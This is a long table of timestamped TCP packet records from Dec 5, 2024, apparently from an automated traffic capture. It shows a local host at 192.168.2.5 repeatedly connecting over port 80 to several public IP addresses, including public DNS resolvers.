                                                                                Dec 5, 2024 14:26:39.844589949 CET4994380192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:39.964272022 CET8049943182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:41.209420919 CET804994849.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:26:41.214967966 CET4994880192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:41.217799902 CET4995080192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:41.337526083 CET804995027.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:41.337613106 CET4995080192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:41.337794065 CET4995080192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:41.458461046 CET804995027.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:43.119719982 CET804995027.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:43.127244949 CET4995080192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:43.127712965 CET4995680192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:43.248029947 CET804995627.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:43.251792908 CET4995680192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:43.251868963 CET4995680192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:43.371603012 CET804995627.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:45.080378056 CET804995627.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:45.105900049 CET4995680192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:45.165364981 CET4996180192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:45.166935921 CET4996280192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:45.285181046 CET8049961119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:45.285599947 CET4996180192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:45.286613941 CET8049962182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:45.286691904 CET4996280192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:45.287086010 CET4996180192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:45.287271976 CET4996280192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:45.406768084 CET8049961119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:45.407062054 CET8049962182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:46.521205902 CET8049961119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:46.521255016 CET4996180192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:46.521378994 CET4996180192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:46.521383047 CET8049961119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:46.521434069 CET4996180192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:46.526987076 CET4996780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:46.641205072 CET8049961119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:46.646837950 CET804996727.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:46.646922112 CET4996780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:46.647070885 CET4996780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:46.766738892 CET804996727.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:46.864692926 CET8049962182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:46.864753008 CET4996280192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:46.864816904 CET4996280192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:46.864918947 CET8049962182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:46.864964008 CET4996280192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:46.984666109 CET8049962182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:48.421031952 CET804996727.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:26:48.427262068 CET4996780192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:26:48.427552938 CET4997380192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:48.547277927 CET804997327.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:48.547344923 CET4997380192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:48.547483921 CET4997380192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:48.667512894 CET804997327.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:50.305517912 CET804997327.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:26:50.314167023 CET4997380192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:26:50.811131001 CET4997980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:26:50.930938005 CET8049979123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:26:50.937768936 CET4997980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:26:50.957849979 CET4997980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:26:51.077655077 CET8049979123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:26:52.510710001 CET8049979123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:26:52.515347958 CET4997980192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:26:52.520142078 CET4998580192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:52.521245956 CET4998680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:52.639955044 CET8049985119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:52.640032053 CET4998580192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:52.640202045 CET4998580192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:52.640942097 CET8049986182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:52.641005993 CET4998680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:52.641159058 CET4998680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:52.762250900 CET8049985119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:52.763356924 CET8049986182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:53.025316954 CET8049922114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:53.027832985 CET4992280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:53.027899027 CET4992280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:53.031737089 CET4998780192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:53.147667885 CET8049922114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:53.151535034 CET8049987114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:53.151808023 CET4998780192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:53.152030945 CET4998780192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:26:53.271821022 CET8049987114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:26:54.369816065 CET8049985119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:54.369878054 CET4998580192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:54.369904041 CET8049985119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:54.369951010 CET4998580192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:54.369976997 CET4998580192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:54.374357939 CET4998980192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:54.489751101 CET8049985119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:54.494168997 CET8049989183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:54.494239092 CET4998980192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:54.494318962 CET4998980192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:54.614058971 CET8049989183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:55.637254000 CET8049986182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:55.637401104 CET8049986182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:55.637475014 CET4998680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:55.637550116 CET4998680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:55.757316113 CET8049986182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:56.056746006 CET8049989183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:56.061630011 CET4998980192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:56.474791050 CET4999580192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:56.594546080 CET8049995183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:56.594604015 CET4999580192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:56.596960068 CET4999580192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:56.716931105 CET8049995183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:58.148675919 CET8049995183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:26:58.157227039 CET4999580192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:26:58.166039944 CET5000180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:58.170789957 CET5000280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:58.285934925 CET8050001182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:58.285999060 CET5000180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:58.286137104 CET5000180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:58.290565014 CET8050002119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:58.290620089 CET5000280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:58.290731907 CET5000280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:58.405869007 CET8050001182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:58.410825968 CET8050002119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:59.513760090 CET8050002119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:59.513820887 CET8050002119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:59.513848066 CET5000280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:59.513890982 CET5000280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:59.551424980 CET5000280192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:26:59.573761940 CET5000780192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:59.672219038 CET8050002119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:26:59.696518898 CET805000749.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:26:59.696608067 CET5000780192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:59.698271036 CET5000780192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:26:59.818038940 CET805000749.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:26:59.906419039 CET8050001182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:59.906547070 CET8050001182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:26:59.906550884 CET5000180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:59.906622887 CET5000180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:26:59.906691074 CET5000180192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:00.026791096 CET8050001182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:00.150713921 CET8049942114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:00.150774002 CET4994280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:00.150872946 CET4994280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:00.151640892 CET5000980192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:00.271008015 CET8049942114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:00.271378040 CET8050009114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:00.271441936 CET5000980192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:00.271812916 CET5000980192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:00.392301083 CET8050009114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:01.395277977 CET4998780192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:01.395384073 CET5000980192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:01.397080898 CET5001480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:01.517016888 CET8050014114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:01.517548084 CET5001480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:01.517812014 CET5001480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:01.637517929 CET8050014114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:04.225837946 CET805000749.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:27:04.231163025 CET5000780192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:27:04.231911898 CET5002080192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:27:04.351744890 CET8050020123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:27:04.351813078 CET5002080192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:27:04.351999998 CET5002080192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:27:04.471801996 CET8050020123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:27:05.633759022 CET5001480192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:05.929930925 CET8050020123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:27:05.934792995 CET5002080192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:27:05.942413092 CET5002680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:05.942564011 CET5002780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:05.943209887 CET5002880192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:06.062263012 CET8050026182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:06.062280893 CET8050027119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:06.062371969 CET5002680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:06.062375069 CET5002780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:06.062565088 CET5002680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:06.062864065 CET5002780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:06.062930107 CET8050028114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:06.062983990 CET5002880192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:06.063364983 CET5002880192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:06.182348013 CET8050026182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:06.182579994 CET8050027119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:06.183011055 CET8050028114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:07.295473099 CET8050027119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:07.295523882 CET8050027119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:07.295551062 CET5002780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:07.295576096 CET5002780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:07.295639992 CET5002780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:07.303301096 CET5003080192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:27:07.416174889 CET8050027119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:07.423041105 CET8050030183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:27:07.423125029 CET5003080192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:27:07.423237085 CET5003080192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:27:07.543015957 CET8050030183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:27:07.649446011 CET8050026182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:07.649548054 CET8050026182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:07.649580002 CET5002680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:07.650064945 CET5002680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:07.657319069 CET5002680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:07.777177095 CET8050026182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:08.964220047 CET8050030183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:27:08.973190069 CET5003080192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:27:08.975769043 CET5003580192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:09.095540047 CET805003527.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:27:09.095890999 CET5003580192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:09.095890999 CET5003580192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:09.215818882 CET805003527.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:27:09.941646099 CET5002880192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:10.935267925 CET805003527.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:27:10.988814116 CET5003580192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:11.025849104 CET5003580192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:11.031769991 CET5004080192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:27:11.151643991 CET805004027.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:27:11.151869059 CET5004080192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:27:11.155288935 CET5004080192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:27:11.275130033 CET805004027.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:27:12.934119940 CET805004027.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:27:12.938015938 CET5004080192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:27:12.942584991 CET5004680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:12.942694902 CET5004780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:12.947765112 CET5004880192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:13.062747002 CET8050046182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:13.062783957 CET8050047119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:13.063899994 CET5004780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:13.063901901 CET5004680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:13.064100981 CET5004780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:13.064102888 CET5004680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:13.067622900 CET8050048114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:13.067747116 CET5004880192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:13.071764946 CET5004880192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:13.183907986 CET8050047119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:13.183936119 CET8050046182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:13.191517115 CET8050048114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:14.318424940 CET8050047119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:14.318445921 CET8050047119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:14.318475962 CET5004780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:14.318506002 CET5004780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:14.318567038 CET5004780192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:14.323699951 CET5005280192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:27:14.438442945 CET8050047119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:14.443496943 CET805005227.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:27:14.443552971 CET5005280192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:27:14.443644047 CET5005280192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:27:14.563474894 CET805005227.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:27:14.664510012 CET8050046182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:14.664618015 CET8050046182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:14.664650917 CET5004680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:14.664679050 CET5004680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:14.664735079 CET5004680192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:14.784707069 CET8050046182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:16.259028912 CET805005227.221.16.179192.168.2.5
                                                                                Dec 5, 2024 14:27:16.265422106 CET5005280192.168.2.527.221.16.179
                                                                                Dec 5, 2024 14:27:16.265847921 CET5005680192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:16.386089087 CET805005627.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:27:16.386162996 CET5005680192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:16.386384010 CET5005680192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:16.506079912 CET805005627.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:27:16.961981058 CET5004880192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:18.197642088 CET805005627.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:27:18.201893091 CET5005680192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:18.202750921 CET5006180192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:27:18.322719097 CET8050061123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:27:18.322810888 CET5006180192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:27:18.322895050 CET5006180192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:27:18.443213940 CET8050061123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:27:19.897171021 CET8050061123.126.45.208192.168.2.5
                                                                                Dec 5, 2024 14:27:19.901731968 CET5006180192.168.2.5123.126.45.208
                                                                                Dec 5, 2024 14:27:19.905616999 CET5006780192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:19.907195091 CET5006880192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:19.909914017 CET5006980192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:20.025585890 CET8050067114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:20.025666952 CET5006780192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:20.026598930 CET5006780192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:20.026922941 CET8050068182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:20.026988983 CET5006880192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:20.027196884 CET5006880192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:20.029618979 CET8050069119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:20.029678106 CET5006980192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:20.029937983 CET5006980192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:20.146312952 CET8050067114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:20.146840096 CET8050068182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:20.149736881 CET8050069119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:21.254275084 CET8050069119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:21.254355907 CET8050069119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:21.254479885 CET5006980192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:21.258497000 CET5006980192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:21.289211035 CET5007380192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:27:21.379458904 CET8050069119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:21.410165071 CET8050073183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:27:21.415887117 CET5007380192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:27:21.416002035 CET5007380192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:27:21.536060095 CET8050073183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:27:21.593816042 CET8050068182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:21.593836069 CET8050068182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:21.595844030 CET5006880192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:21.596560001 CET5006880192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:21.719902992 CET8050068182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:22.952295065 CET8050073183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:27:22.956842899 CET5007380192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:27:22.957478046 CET5007880192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:27:23.077719927 CET8050078183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:27:23.078037977 CET5007880192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:27:23.078197002 CET5007880192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:27:23.197896004 CET8050078183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:27:23.910418034 CET5006780192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:24.623226881 CET8050078183.60.95.221192.168.2.5
                                                                                Dec 5, 2024 14:27:24.683907986 CET5007880192.168.2.5183.60.95.221
                                                                                Dec 5, 2024 14:27:24.895530939 CET5008280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:24.901503086 CET5008380192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:24.981312990 CET5008480192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:25.015338898 CET8050082114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:25.015456915 CET5008280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:25.015767097 CET5008280192.168.2.5114.114.114.114
                                                                                Dec 5, 2024 14:27:25.021425962 CET8050083119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:25.021517992 CET5008380192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:25.021914005 CET5008380192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:25.101327896 CET8050084182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:25.101438999 CET5008480192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:25.101630926 CET5008480192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:25.137768984 CET8050082114.114.114.114192.168.2.5
                                                                                Dec 5, 2024 14:27:25.145382881 CET8050083119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:25.223694086 CET8050084182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:26.245949030 CET8050083119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:26.246001005 CET8050083119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:26.246010065 CET5008380192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:26.246073008 CET5008380192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:26.246088028 CET5008380192.168.2.5119.29.29.29
                                                                                Dec 5, 2024 14:27:26.249917030 CET5008580192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:27:26.365756989 CET8050083119.29.29.29192.168.2.5
                                                                                Dec 5, 2024 14:27:26.369659901 CET805008549.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:27:26.369762897 CET5008580192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:27:26.369856119 CET5008580192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:27:26.489710093 CET805008549.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:27:26.661813974 CET8050084182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:26.661896944 CET5008480192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:26.661953926 CET8050084182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:26.661967993 CET5008480192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:26.662003994 CET5008480192.168.2.5182.254.116.116
                                                                                Dec 5, 2024 14:27:26.781691074 CET8050084182.254.116.116192.168.2.5
                                                                                Dec 5, 2024 14:27:27.945915937 CET805008549.7.37.97192.168.2.5
                                                                                Dec 5, 2024 14:27:27.950721979 CET5008580192.168.2.549.7.37.97
                                                                                Dec 5, 2024 14:27:29.109939098 CET5008680192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:29.229757071 CET805008627.221.16.149192.168.2.5
                                                                                Dec 5, 2024 14:27:29.231728077 CET5008680192.168.2.527.221.16.149
                                                                                Dec 5, 2024 14:27:29.231812000 CET5008680192.168.2.527.221.16.149
